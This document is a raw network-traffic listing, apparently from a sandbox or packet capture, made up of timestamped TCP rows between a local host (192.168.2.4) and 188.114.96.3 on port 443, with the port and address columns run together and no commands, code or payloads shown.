                                                                  Dec 30, 2024 22:42:42.355943918 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.355969906 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356000900 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356020927 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356054068 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356059074 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356096983 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356096983 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356302977 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356322050 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356369972 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356375933 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356414080 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356477022 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356494904 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356527090 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356530905 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356539965 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356564999 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356739044 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356759071 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356787920 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356791973 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.356827021 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.356978893 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357011080 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.357017994 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357021093 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.357031107 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357067108 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.357119083 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357137918 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357166052 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.357172012 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357198000 CET44358525188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357213020 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.357223988 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.357373953 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357393026 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357424021 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.357429028 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357450008 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.357464075 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.357673883 CET58525443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.357691050 CET44358525188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.357978106 CET44358525188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.358498096 CET58525443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.358553886 CET44358525188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.358695984 CET58525443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.358710051 CET44358525188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.360035896 CET44358526188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.360235929 CET58526443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.360249996 CET44358526188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.360531092 CET44358526188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.360794067 CET58526443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.360845089 CET44358526188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.360893011 CET58526443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.403934956 CET58526443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.403940916 CET44358526188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.429332018 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.429352045 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.429408073 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.429413080 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.429449081 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.429512978 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.429533958 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.429564953 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.429569960 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.429584980 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.429615021 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.429759026 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.429779053 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.429820061 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.429824114 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.429836988 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.429860115 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.430140972 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.430160999 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.430193901 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.430197954 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.430221081 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.430231094 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.430468082 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.430489063 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.430516958 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.430521011 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.430548906 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.430558920 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.430641890 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.430661917 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.430697918 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.430701971 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.430742025 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.430742025 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.431047916 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.431066990 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.431102037 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.431107044 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.431123018 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.431140900 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.431289911 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.431333065 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.431340933 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.431346893 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.431375027 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.431390047 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.432676077 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.518148899 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.518199921 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.518416882 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.518476963 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.518630981 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.518894911 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.518923998 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.519012928 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.519165993 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.519186974 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.519220114 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.519227028 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.519239902 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.519262075 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.519593000 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.519606113 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.519613028 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.519653082 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.519658089 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.519685984 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.519705057 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.520214081 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.520235062 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.520276070 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.520279884 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.520318985 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.520330906 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.520473003 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.520509958 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.520525932 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.520529985 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.520559072 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.520585060 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.606970072 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.606990099 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607050896 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607059002 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607095957 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607095957 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607116938 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607122898 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607136965 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607151031 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607182980 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607359886 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607378006 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607422113 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607426882 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607445002 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607470036 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607690096 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607708931 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607744932 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607748985 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607777119 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607791901 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.607938051 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.607969046 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.608000994 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.608006001 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.608028889 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.608043909 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.608418941 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.608438015 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.608474970 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.608479023 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.608522892 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.608536005 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.608865023 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.608886957 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.608944893 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.608949900 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.608980894 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.608980894 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.609242916 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.609261990 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.609297991 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.609302044 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.609325886 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.609344959 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.610291958 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.695686102 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.695707083 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.695797920 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.695805073 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.695852041 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.695856094 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.695863962 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.695910931 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.695916891 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.695938110 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.695970058 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.695991993 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.696104050 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696126938 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696158886 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.696162939 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696192026 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.696233034 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.696433067 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696468115 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696496010 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.696506023 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696531057 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.696549892 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.696835995 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696870089 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696902990 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.696907043 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696928978 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696937084 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.696954012 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696959972 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.696966887 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.696986914 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.697025061 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.697710991 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.697730064 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.697779894 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.697786093 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.697833061 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.697971106 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.697990894 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.698026896 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.698033094 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.698048115 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.698076010 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.784609079 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.784636021 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.784712076 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.784718990 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.784766912 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.784816980 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.784837961 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.784878016 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.784882069 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.784933090 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.784951925 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.784989119 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785007954 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785044909 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.785049915 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785074949 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.785088062 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.785432100 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785469055 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785489082 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.785492897 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785522938 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.785531998 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785546064 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.785550117 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785595894 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.785605907 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785620928 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785669088 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.785799980 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785832882 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785861969 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.785866022 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.785891056 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.785904884 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.786396027 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.786416054 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.786483049 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.786488056 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.786533117 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.786773920 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.786793947 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.786835909 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.786840916 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.786883116 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.786902905 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.820255995 CET44358522188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.820324898 CET44358522188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.820892096 CET58522443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.821098089 CET58522443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.821127892 CET44358522188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.822849035 CET58527443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.822891951 CET44358527188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.823323965 CET58527443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.823538065 CET58527443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.823551893 CET44358527188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.859008074 CET44358524188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.859081984 CET44358524188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.859126091 CET58524443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.860121965 CET58524443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.860138893 CET44358524188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.862322092 CET58528443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.862420082 CET44358528188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.862505913 CET58528443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.862682104 CET58528443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.862710953 CET44358528188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873105049 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873126030 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873203039 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.873209000 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873251915 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.873634100 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873656988 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873694897 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.873699903 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873733997 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.873738050 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873749018 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.873753071 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873766899 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873781919 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.873826981 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.873831034 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.873869896 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.874000072 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.874017954 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.874056101 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.874059916 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.874094963 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.874159098 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.874301910 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.874324083 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.874360085 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.874363899 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.874387980 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.874404907 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.874530077 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.874551058 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.874582052 CET58509443192.168.2.4188.114.96.3
